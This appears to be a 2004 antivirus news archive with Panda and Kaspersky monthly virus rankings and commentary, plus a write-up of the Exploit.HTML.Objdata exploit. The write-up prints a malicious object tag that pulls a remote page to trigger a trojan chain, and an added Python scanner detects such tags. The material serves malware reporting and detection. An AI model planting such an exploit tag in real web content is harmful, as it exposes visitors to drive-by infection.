News archive about antivirus software, virus threats, trojans
November 2004
Top Ten viruses most frequently detected by Panda ActiveScan in October -- Posted by Igor_Donchenko on Tuesday, November 2 2004
No unusual virus activity was registered in October. The new viruses detected during this period did not cause any significant incidents. This is reflected in the October edition of the Top Ten viruses. According to data gathered by Panda Software's free online scanner, ActiveScan, Downloader.GK was, for the fifth month running, the most frequently detected malicious code.
Downloader.GK is programmed to install spyware and adware on affected computers, and caused over 23 percent of attacks registered last month. Second place is taken by Mhtredir.gen, a generic detection for a large group of Trojans that allow code to be run remotely on the affected computer, without the user’s permission.
The Mabutu.A worm, which came in eighth in the September edition of the Top Ten, climbed up to third place in October. Even though it is an email worm, Mabutu.A also acts as a backdoor Trojan, making it particularly dangerous. Netsky.P, a worm that has appeared in the Top Ten ranking of the most frequently detected viruses over the last few months, ranked fourth in the latest edition. This could be because it exploits a vulnerability in the browser Microsoft Internet Explorer to run automatically.
The generic detections for the Gaobot (Gaobot.gen) family of worms and for the script created by the infamous Sasser worms to download themselves to computers via FTP (Sasser.ftp), came in fifth and sixth. Seventh place was occupied by StartPage.FH, another Trojan designed to install malware on affected computers.
The bottom part of the Top Ten includes Qhost.gen, a generic detection for the modifications made to the HOSTS file by various Trojans; Downloader.OU, another member of this group of malicious code and Sdbot.gen, a generic detection for the Sdbot family of worms.
| Virus Name | Percentage |
|---|---|
| Trj/Downloader.GK | 23,15% |
| Mhtredir.gen | 5,77% |
| W32/Mabutu.A.worm | 5,62% |
| W32/Netsky.P.worm | 5,33% |
| W32/Gaobot.gen.worm | 4,67% |
| W32/Sasser.ftp | 4,56% |
| Trj/StartPage.FH | 3,51% |
| Trj/Qhost.gen | 2,48% |
| Trj/Downloader.OU | 2,19% |
| W32/Sdbot.gen.worm | 2,08% |
The following conclusions can be drawn from the data collected by Panda ActiveScan in October:
- The number of incidents caused by computer worms has increased. Unlike previous months, in which the number of Trojans detected was higher than the number of worms, last month a similar number of each of these types of malicious code was detected. However, bear in mind that all the worms on this list have Trojan functions. This confirms that there is a large amount of criminal activity on the Internet, as Trojans are often used by cyber criminals to commit fraud, above all financial fraud.
- Financial gain: the main motivation for creating malware. Several of the Trojans in the October Top Ten are designed to install other malware, like spyware or adware, on affected computers. This once again demonstrates that the creators of Internet threats are motivated by financial gain: selling data on users' browsing habits, for example, can earn substantial profits.
- Many users are not correctly applying the patches that fix vulnerabilities in their installed software. The presence of Netsky.P, which exploits a known vulnerability that was fixed three months ago, is proof of this. Similarly, the Sasser worms, which also exploit a security flaw in Windows to infect computers directly via the Internet, are still around.
Source: http://www.pandasoftware.com
The Virus Top Twenty for October 2004 from Kaspersky Labs -- Posted by Igor_Donchenko on Tuesday, November 2 2004
| Ranking | Change | Virus Name | Percentage |
|---|---|---|---|
| 1 | - | I-Worm.Netsky.q | 15.95% |
| 2 | -1 | I-Worm.Netsky.aa | 14.45% |
| 3 | +1 | I-Worm.Netsky.b | 10.52% |
| 4 | +8 | I-Worm.Bagle.as | 7.43% |
| 5 | +1 | I-Worm.Bagle.z | 6.59% |
| 6 | -1 | I-Worm.Mydoom.m | 5.90% |
| 7 | new | I-Worm.Bagle.at | 4.01% |
| 8 | -5 | I-Worm.Zafi.b | 3.03% |
| 9 | - | I-Worm.Netsky.t | 2.90% |
| 10 | -3 | I-Worm.Netsky.d | 2.83% |
| 11 | -1 | I-Worm.Netsky.y | 2.31% |
| 12 | -1 | I-worm.LovGate.w | 2.30% |
| 13 | - | I-Worm.Mydoom.l | 1.82% |
| 14 | new | I-Worm.Mydoom.ab | 1.75% |
| 15 | -1 | I-Worm.NetSky.r | 1.39% |
| 16 | - | I-Worm.Bagle.gen | 1.37% |
| 17 | re-entry | I-Worm.Mydoom.r | 1.31% |
| 18 | -1 | I-Worm.NetSky.c | 0.95% |
| 19 | - | I-Worm.Bagle.ah | 0.87% |
| 20 | re-entry | Backdoor.Win32.Rbot.gen | 0.51% |
| | | Other malicious programs (not in the Top 20) | 12% |
October, like September, saw further new variants of Mydoom and Bagle. Mydoom.ab (Swash.a) and Bagle.at appeared within a few days of each other. In fact, Bagle.at was followed immediately by a clone, Bagle.au, though the clone did not make the Top Twenty. The Bagle mass mailing of October 29 was so effective that it took Bagle.at only 3 days to reach seventh place in the Top Twenty.
On the other hand, the high ranking was achieved in the first day: the numbers have fallen in the past two days and Bagle.at may well not rank so high in November. A new version of the Hungarian I-Worm.Zafi.c was detected in the interim between Mydoom.ab and Bagle.at. This third variant has not been seen in the wild yet, though an outbreak is highly probable if we remember how long the previous variant was in the Top Twenty.
In all other respects, the October Top Twenty is almost identical to the September Top Twenty. NetSky variants are on top, with Bagle and Mydoom variants continuing their fruitless efforts to outrank them. Bagle.as has moved noticeably: 8 slots in one month. Zafi.b continues falling, 5 places, with a high probability of leaving the Top Twenty by November. If this occurs, LovGate.w will be the only malicious program on the list that is not a member of the Big Three.
TrojanDownloader.JS.Gen and TrojanDropper.VBS.Zerolin have already left the rankings, despite a number of mass mailings containing these programs. However, other malicious programs proved more active and pushed these Trojans out of the Top Twenty.
However, other malicious programs continue to challenge the Big Three: Backdoor.Win32.Rbot.gen returned to the ratings this month. This backdoor, a hard-hitting bot, is controlled via IRC channels; it normally spreads by exploiting various vulnerabilities in Windows (RPC DCOM, LSASS and so forth). This month, virus writers seem to have decided that SP2 for Windows XP created too many barriers: they chose to send Rbot via email instead, and successfully, as the statistics demonstrate.
Sadly, we cannot look forward to life without Bagle and Mydoom yet. The source codes of both worms have been widely publicized on the Internet and spread by the worms themselves. Most of the virus activity we have witnessed recently has been caused by variants of these two worms, or, to be precise, recompiled versions of the published source code.
Other malware made up a significant proportion of Internet traffic this month: we detected over 200 different malicious programs.
Summary:
- New viruses: Bagle.at, Mydoom.ab
- Moved up: NetSky.b, Bagle.as, Bagle.z
- Moved down: Mydoom.m, Zafi.b, NetSky.d, NetSky.y, LovGate.w, NetSky.r, NetSky.c
- No change: NetSky.q, NetSky.aa, NetSky.t, Mydoom.l, Bagle.gen, Bagle.ah
- Re-entry: Mydoom.r, Rbot.gen
Source: http://www.kaspersky.com
Exploit.HTML.Objdata -- Posted by Igor_Donchenko on Monday, November 1 2004
Exploit.HTML.Objdata (Kaspersky Lab) is also known as: Exploit-ObjectData (McAfee), Trojan Horse (Symantec), Exploit:HTML/Objectdata* (RAV), HTML_OBJECTEXP.A (Trend Micro), PMS/Exploit.ObjData (H+BEDV), VBS:Malware (ALWIL), HTML.Daemonize.Loader.A (SOFTWIN)
Behavior: Exploit
Technical Details: ObjData is an exploit often seen in spam mailings.
ObjData attempts to use the Object Type vulnerability and two further vulnerabilities in MS Windows that could allow an attacker to run arbitrary code on the user's system, described in the following Security Bulletins:
Microsoft Security Bulletin MS03-032
Microsoft Security Bulletin MS03-040
These vulnerabilities are critical since they allow arbitrary malicious code to execute when users visit specially constructed HTML pages.
A sample of code from the end of the file:
<objectdata="http:/ /www.fat bonuscas ino.com/ page.php">
Decryption of the above: http://www.fatbonuscasino.com/page.php
Once users connect to this site, a chain of Trojans hits:
- TrojanDropper.VBS.Zerolin, which extracts TrojanDropper.Win32.Small.ei from itself and executes it.
- Small.ei in turn extracts two more Trojans from itself: TrojanNotifier.Win32.Small.d and TrojanProxy.Win32.Daemonize.j.
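As an added example (not part of the original post or of any vendor's detection), a small Python scanner that flags HTML mail bodies carrying an object tag whose data attribute points at a remote URL, the pattern the MS03-032/MS03-040 exploit relies on, and that normalizes the whitespace scattered through the tag and URL as in the sample above. The mail body and the benign second tag are constructed, and treating the scattered spaces as deliberate obfuscation rather than extraction damage is an assumption.

```python
import re
from typing import Dict, List

# Constructed sample mail body. The first tag reproduces the sample from the
# page (spaces inside the tag and URL, assumed to be obfuscation); the second
# is a benign local reference for contrast.
SAMPLE_HTML = """<html><body>
<p>Visit our casino and win big!</p>
<objectdata="http:/ /www.fat bonuscas ino.com/ page.php">
<object data="images/logo.png" type="image/png"></object>
</body></html>"""

# An <object ...> start tag; "\s*" after "object" is deliberately optional so
# "<objectdata=" (no space) is still caught. Closing </object> does not match.
OBJECT_TAG_RE = re.compile(r"<\s*object([^>]*)>", re.IGNORECASE)

# The data attribute inside the tag: double-quoted, single-quoted or bare.
DATA_ATTR_RE = re.compile(
    r"(?<![\w-])data\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))", re.IGNORECASE)


def normalize_url(raw: str) -> str:
    """Strip every whitespace character inserted into the attribute value."""
    return re.sub(r"\s+", "", raw)


def is_remote(url: str) -> bool:
    """True when the object would be fetched from another host."""
    return url.lower().startswith(("http://", "https://", "ftp://", "//"))


def find_object_data(html: str) -> List[Dict[str, object]]:
    """Return one record per object tag that carries a data attribute."""
    findings = []
    for tag in OBJECT_TAG_RE.finditer(html):
        m = DATA_ATTR_RE.search(tag.group(1))
        if not m:
            continue
        raw = next(g for g in m.groups() if g is not None)
        url = normalize_url(raw)
        findings.append({"tag": tag.group(0), "raw_data": raw, "url": url,
                         "remote": is_remote(url),
                         "obfuscated": raw != url})  # whitespace was inserted
    return findings


def suspicious_urls(html: str) -> List[str]:
    """URLs of object tags that pull remote content; each is worth blocking."""
    return [str(f["url"]) for f in find_object_data(html) if f["remote"]]
```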
Source: http://www.viruslist.com